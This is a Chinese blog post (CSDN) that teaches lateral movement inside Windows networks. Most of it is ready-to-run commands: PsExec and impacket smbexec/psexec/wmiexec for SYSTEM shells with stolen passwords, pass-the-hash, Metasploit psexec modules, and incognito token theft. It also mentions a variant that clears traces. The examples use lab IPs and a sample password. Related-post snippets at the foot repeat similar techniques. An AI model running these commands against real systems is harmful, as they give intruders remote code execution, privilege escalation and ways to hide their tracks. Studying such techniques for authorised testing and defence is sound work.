使用外部工具横向移动

最新推荐文章于 2024-06-14 09:16:11 发布
最新推荐文章于 2024-06-14 09:16:11 发布
阅读量661 收藏
点赞数
分类专栏: 内网渗透 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/130998504
版权

Smbexe、Psexec

Psexec

PsExec是一种轻巧的telnet代替品,可让您在其他系统上执行进程,并为控制台应用提供完整的交互性,无需手动安装客户端软件。

原理:

1、ipc$连接,释放Psexesvc.exe

2、OpenSCManager打开受害者机器上服务控制管理器的句柄

3、CreateService创建服务

4、获取服务句柄OpenService使用StartService启动服务

建立IPC连接,无需输入密码

net use  \\IP  /user:用户名  密码

反弹cmd

psexec.exe  \\192.168.222.135  -s cmd.exe  -acceptcula

执行命令:

psexec.exe  \\192.168.222.135  whoami  -acceptcula

若没有建立ipc连接则需要使用参数连接

psexec.exe  \\192.168.222.150  -u Administrator -p hjw123...  -s  cmd.exe

-acceptcula是指第一次运行psexec会弹出确认框,使用该参数就不会弹出确认框。-s是指以System权限运行远程进程,获得一个System权限的交互式Shell。如果不使用该参数,会获得一个Administrator权限的shell。

Smbexec

smbexec是一款基于psexec的域渗透测试工具

工具集合:impacket/examples at master · fortra/impacket · GitHub

操作:

1、安装依赖

python -m pip install impacket

2、运行smbexec.py

python smbexec.py 用户名:密码@ip地址
python smbexec.py web2/Administrator:hjw123..@192.168.222.136

3、还可以运行psexec.py,这里与官方的不同就是可以将痕迹进行清除

python psexec.py 用户名:密码@ip地址
python psexec.py web2/Administrator:hjw123..@192.168.222.136

Wmiexec

1、使用wmiexec.py脚本

python wmiexec.py 用户名:密码@ip
python wmiexec.py Administrator:hjw123..@192.168.222.136

2、cscript + wmiexec .vbs脚本实现psexec功能

cscript  //nologo  wmiexec.vbs  /shell  ip  用户名  密码
cscript  //nologo  wmiexec.vbs  /shell  192.168.222.135 Administrator hjw123..

解释:这里nologo参数是用来不需要弹窗的

这里也可以执行单条命令

拓展:wmiexec.py脚本还支持通过hash传递获得shell

python3 wmiexec.py -hashes LMHash:NTHash 域名/用户名@目标IP

Metasploit

1、psexec_command

auxiliary/admin/smb/psexec_command

2、psexec

exploit/windows/smb/psexec

3、Token窃取

在Metasploit中,可以使用incognito实现token窃取,Metasploit中的incognito,是从windows平台下的incognito移植过来的

//加载incognito模块
load  incognito

//提升权限
getsystem

//列举token
list_tokens -u

//token窃取
impersonate_token  "NT AUTHORITY\\SYSTEM"

//从进程窃取token
steal_token 4567

//返回之前的token
drop_token

token简介:

Windows 的 AccessToken 有两种类型:

  • Delegation Token:授权令牌,它支持交互式会话登录 (例如本地用户直接 登录、远程桌面登录访问)
  • Impresonation Token:模拟令牌,它是非交互的会话 (例如使用 net use 访问共享文件夹)。

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Impacket的使用
谢公子的博客
03-14 4478
Impacket Impacket是用于处理网络协议的Python类的集合,用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等协议进行低级编程访问。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。 项目地址:https...
smbexec使用(c$共享)
谢公子的博客
02-02 4515
目录 smbexec Impacket中的smbexec.py smbexec可以通过文件共享在运程系统中执行命令。对方主机需要开启 c$ 共享。 smbexec 工具说明: test.exe:客户端主程序 execserver.exe:目标系统中的辅助程序 使用: 将execserver.exe上次到目标系统的C:\Windows\目录下,以解除UAC对命令执行的限制,命令如下:...
smbexec: 简单、高效的远程执行命令工具
gitblog_00002的博客
03-18 506
smbexec: 简单、高效的远程执行命令工具 smbexec 是一个轻量级的 Python 脚本,用于通过 SMB 协议在目标机器上执行命令。它利用了 Windows 操作系统中的某些漏洞,可以轻松地实现远程命令执行。smbexec 使用简单,功能强大,是渗透测试和网络安全研究的理想工具。 应用场景 smbexec 可以广泛应用于以下场景: 网络审计:对内网进行安全审计,发现潜在的安全风险。 ...
【内网学习笔记】23、SMBExec 与 DCOM 的使用
TeamsSix 的 CSDN 空间
09-04 1416
1、SMBExec 利用 SMBExec 可以通过文件共享(admin$、c$、ipc$、d$)在远程系统中执行命令,它的工作方式类似于 PsExec C++ 版 C++ 版项目地址:https://github.com/sunorr/smbexec 一看这个项目是 8 年前上传的了,然后试了用 VS2019 没编译成功,而且目前各大杀软也都查杀这个工具了,所以这个就不看了,直接看 impacket 里的同类工具。 impacket 版 在 impacket 工具包里包含了 smbexec.py 工具使用
内网安全:WMI协议与SMB协议横向移动
qq_61553520的博客
08-24 1791
此外,SMB协议还经过不断的发展和改进,最新的版本是SMB3,它引入了更高的性能和安全性特性。它是在局域网(LAN)中广泛使用的一种协议,最初由IBM开发,后来由微软引入并逐渐发展为现代的SMB协议。WMI协议的主要目标是提供一种统一的接口,使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议,可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。SMB协议的作用是允许计算机之间共享文件和资源,并提供对这些共享资源的访问和管理。
IndorilConverter:移植 TES3 的工具
07-05
将 TES3: Morrowind .esp/.esm 文件移植到 TES5: Skyrim 的工具。 用于将用户制作的 mod 移动到较新的引擎,并进行一些增强。 目前正在大力开发中,尚未完成。 截至 2014 年 12 月 9 日的现状: 以下记录已转换并...
Hands-On-AWS-Penetration-Testing-with-Kali-Linux:Packt发布的使用Kali Linux进行AWS渗透测试
05-27
熟悉并渗透最常见的面向外部的AWS服务审核您自己的基础架构,并确定缺陷,弱点和漏洞通过部分受损的AWS帐户演示横向和纵向移动的过程保持隐身性和受影响的AWS帐户中的持久性掌握渗透测试的动手方法发现许多自动化...
蚁景网安渗透测试学习路径图最新.pdf
06-22
蚁景网安渗透测试学习路径图最新.pdf...* 横向移动 - 外部工具篇 * 内网横向移动 * 内网横向移动时需要用到的工具以及 该文档提供了一个广泛的学习路径图,涵盖了从基本的 Linux 操作系统到高级的渗透测试和免杀技术。
Neutron Music Player v1.93.4 patched
03-26
*横向和纵向的UI模式(包括反向)。 *简约部件:中子迷你。 *播放/空闲/唤醒状态的任务栏的通知。 *可移动的外置SD卡。 *播放排序:(源,专辑,艺术家,流派),洗牌(包括循环洗牌),循环的多个实例。 * Unicode...
smbexec使用
weixin_45007073的博客
10-08 2091
smbexec使用安装工具说明主菜单项1主菜单项2 安装 首先我们现在Linux环境下安装smbexec这个工具使用的是git clone这个命令 运行install.sh,安装脚本,将smbexec安装在本地的linux中,输入的命令为chmod +x install.sh && ./install.sh,因为我使用的是ubuntu系统,所以选择第一个安装选项 安装完成后,直接输入smbexec命令,会显示smbexec的主菜单 工具说明 主菜单项1 选项1用于扫描目标网络IP地址
渗透测试学习大纲
YYY_0612的博客
07-02 1095
渗透学习大纲
内网渗透-横向移动外部工具使用
lza20001103的博客
10-01 2204
横向移动外部工具使用 前言 文章目录横向移动外部工具使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
域内提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用
Captain_RB的博客
07-03 2892
2021年11月,Microsoft 曝出了两个关于 Windows AD 域提权的漏洞:CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致域内普通用户提升至域管权限,文章主要对漏洞利用使用的两种自动化脚本进行介绍。...............
impacket的使用总结
热门推荐
Shanfenglan's blog
08-27 26万+
smbexec ./smbexec.py test/administrator@192.168.23.99 -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 #左面是lm-hash,右边是nt-hash,lmhash可以为空 ./smbexec.py -hashes :3dbde697d71690a769204beb12283678 test/administrator@192.168.23.99 ./smb
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
最新发布
06-14 273
nc网络收发测试-tcp客户端
cobalt strike横向移动
08-19
C知道:对于Cobalt Strike的横向移动,可以通过以下几种方法实现: 1. 密码猜测和弱口令攻击:使用Cobalt Strike的Beacon模块,可以尝试猜测目标系统的密码或者利用已知的弱口令进行攻击。 2. 漏洞利用:Cobalt Strike集成了多个漏洞利用模块,可以通过针对目标系统的漏洞进行攻击,获取系统权限。 3. 借助已有权限:如果已经获取了某个系统的权限,可以使用Cobalt Strike的post-exploitation功能,通过横向移动命令(如psexec、wmic等)在网络中传播。 4. 社会工程学攻击:Cobalt Strike也可以通过发送钓鱼邮件或者利用其他社会工程学手段,诱使目标用户点击恶意链接或者打开恶意文件,从而在目标系统中植入Beacon。 需要注意的是,横向移动是一项高风险的活动,需要谨慎操作,并且遵守法律法规。在合法授权的情况下使用Cobalt Strike进行安全测试是被允许的,但在未经授权的情况下使用是违法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值